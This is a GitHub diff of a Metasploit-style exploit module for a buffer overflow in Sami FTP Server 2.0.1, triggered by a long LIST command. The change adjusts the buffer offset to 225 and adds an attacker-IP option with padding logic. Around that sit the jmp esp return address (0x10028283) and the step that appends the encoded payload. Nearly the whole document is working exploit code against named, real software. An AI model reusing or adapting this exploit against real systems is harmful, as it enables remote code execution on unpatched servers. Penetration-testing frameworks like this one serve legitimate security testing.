File tree Expand file tree Collapse file tree 1 file changed +10
-4
lines changed
modules/exploits/windows/ftp Expand file tree Collapse file tree 1 file changed +10
-4
lines changed Original file line number Diff line number Diff line change @@ -17,7 +17,7 @@ def initialize(info = {})
17
17
'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow' ,
18
18
'Description' => %q{
19
19
A buffer overflow is triggered when a long LIST
20
- command is sent to the server and the user views the Log tab.
20
+ command is sent to the server while the user is viewing the Logs tab.
21
21
} ,
22
22
'Platform' => 'win' ,
23
23
'Author' =>
@@ -48,18 +48,24 @@ def initialize(info = {})
48
48
'Windows Universal' ,
49
49
{
50
50
'Ret' => 0x10028283 , # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
51
- 'Offset' => 219 ,
51
+ 'Offset' => 225 ,
52
52
} ,
53
53
] ,
54
54
] ,
55
55
'DefaultTarget' => 0 ,
56
56
'DisclosureDate' => 'Feb 27 2013' ) )
57
+ register_options (
58
+ [
59
+ OptString . new ( 'IPADDR' , [ true , 'Attacker\'s IP address' ] )
60
+ ] , self . class )
57
61
end
58
62
59
63
def exploit
60
64
connect_login
61
-
62
- buf = rand_text ( target [ 'Offset' ] , payload_badchars )
65
+ sleep 1
66
+
67
+ ip_length = datastore [ 'IPADDR' ] . length - 3
68
+ buf = rand_text_alphanumeric ( target [ 'Offset' ] - ip_length )
63
69
buf << [ target [ 'Ret' ] ] . pack ( 'V' )
64
70
buf << payload . encoded
65
71
You can’t perform that action at this time.
0 commit comments